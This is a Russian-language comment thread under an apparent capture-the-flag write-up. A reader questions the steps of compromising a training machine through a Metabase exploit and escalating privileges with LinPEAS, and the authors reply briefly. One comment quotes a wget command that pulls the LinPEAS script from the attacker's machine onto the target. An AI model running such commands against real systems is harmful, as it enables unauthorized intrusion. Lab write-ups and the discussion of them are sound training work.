Как стать автором
Обновить

Комментарии 14

Это Metabase

А если бы не было этого сервиса на машине, то что?

то не было бы и самой машины)
в данном случае первичный доступ только через этот сервис

Спасибо за ответ. Я спросил без подвоха. Я обычный обыватель, не IT и спрашиваю, чтобы уяснить. Это было задание на проникновение с определенным сервисом на борту? Не просто на любую произвольную Линукс систему? Правильно?

все верно

Не сочтите за занудство, я не настоящий сварщик. Несколько раз перечитываю Вашу статью и не въезжаю. Уточните пожалуйста, что я неправильно понимаю.

  1. Целевая, подопытная машина 10.10.11.234 которую Вы сканируете на предмет открытых портов с машины(kali) 10.10.16.68 и находите на ней вебсервисMetabase, для которого есть эксплоит.

  2. Запускаете эксплойт где? На Вашей "хакерской" машине kali-10.10.16.68 через порт 4444 для доступа к целевой машине? Тогда почему на картинке Вы к другой машине 10.10.11.233 обращаетесь? А если этот порт 4444 закрыт вообще? Или я вообще не правильно все понимаю?

  3. Далее, я вообще потерялся. "Для дальнейшего продвижения нам нужно закинуть на машину LinPEAS для обнаружения способов повышения привилегий. Поэтому запустим на нашей ОС python3 http.server и через wget скачаем нужный нам скрипт:" На какую машину закинуть LinPEAS? На свою kali или машину жертву? Поэтому, где запускаем http.server? На kali? и качаем через wget http://10.10.16.68/linpeas.sh, но ведь kali и есть 10.10.16.68 Сами себе качаем что-ли? Вы бы как-то отредактировали бы пост, чтобы не было разночтений и непонимания, что есть что(но с поправкой, что я неправильно все понимаю)

  4. Отработав, скрипт найдет креды для подключения по SSH: Что такое креды?

  5. Далее есть еще вопросы, но пожалуйста сначала эти разъясните.

да был небольшой недочет. Мы обращаемся к машине по адресу 10.10.11.233! Чтобы отпали ваши вопросы, почитайте как работает wget. И зачем нам запускать LinPEAS на своей машине? Зачем нам повышать привилегии на своей же машине? Ознакомьтесь с базовыми понятиями и работой сетевых технологий

Базовые понятия я знаю и как wget работает тоже. Не понятно Ваше описание. И что такое креды? Вы же для людей пишите, а не на отъебись. Вы свой сленг знаете, а читатель нет. Почему нельзя общепринятыми терминами изъясняться?

И зачем нам запускать LinPEAS на своей машине? Зачем нам повышать привилегии на своей же машине?

Вот я и отмечаю. У Вас это не явно указано. Отсюда каша.

Для дальнейшего продвижения нам нужно закинуть на машину LinPEAS для обнаружения способов повышения привилегий. Поэтому запустим на нашей ОС python3 http.server и через wget скачаем нужный нам скрипт:"

Наша ОС, это наша машина или машина жертва? Ведь наша же, kali которая.

и сразу, в этом же предложении "И скачаем скрипт" Но скрипт нужен на жертве же? A как мы уже на жертве можем запускать wget? Мы уже на ней? Как? Когда? Где это у Вас явно отмечено? Как мы запускаем wget http://10.10.16.68/linpeas.sh на жертве, если мы еще к ней не подключены по ssh?

И Вы не ответили про порт 4444. Он на жертве открыт? или что? А если закрыт, то как на жертву пробросить эксплойт?

Да,не можем не согласиться,что статья предназначена для Junior специалиста в области информационных технологий и больше ориентирована на читателя, обладающего некоторой терминологией и понятиями в области информационной безопасности, так как предложенная тренировочная площадка отражает элементы отработки определённых шагов Cyber Kill Chain.В связи с тем,что существует достаточно большое количество ресурсов в сети Интернет с описанием данных терминов, они были опущены и оставлены заинтересованному читателю для самостоятельного изучения необъятной области информационных технологий и безопасности?

Здесь же будет находится флаг user.txt

Наверное файл, а не флаг? И файл будет(что делатЬ) находитЬся.

Или Вы имели в виду, "Здесь же находится файл...", без слова будет?

И что? Что это за файл такой user.txt? Зачем вы его упомянули? Если он нужен зачем-то, то объясните, зачем?

Данная статья описывает прохождение тренировочной площадки, где существует своя терминология.Если Вас заинтересовало данное направление, предлагаем самостоятельно отработать шаги из данного примера и попробовать взломать другие машины,на которые нет разборов.Этот подход поможет Вам прокачать свои навыки в области наступательной безопасности.

Что если в машине жертве подключение в ssh не по паролю, а по ключу?

В таком случаем необходимо применять другие техники пентеста для достижения поставленных перед собой целей. В данном вопросе не существует «серебряной пули», и каждый кейс требует индивидуального подхода.

Судя по Вашим формальным ответам, в стиле "Иди учи матчасть" и не ответам, на конкретные вопросы, у меня создается впечатление, что Вы сами не понимаете, о чем ведете речь.
Сдается мне, что Вы просто передрали в сети чей-то труд, как попугай, без понимания, свалили в кучу его картинки и не можете внятно объяснить весь процесс. Поэтому даже не заметили, что сканировали порты у одной машины, а эксплойт пытаетесь внедрить на другую. Возможно, что Вы только перевели все на русский язык, а в нюансах не разобрались
и ничего не понимаете. Но беретесь учить других.

Зарегистрируйтесь на Хабре, чтобы оставить комментарий

Публикации

Истории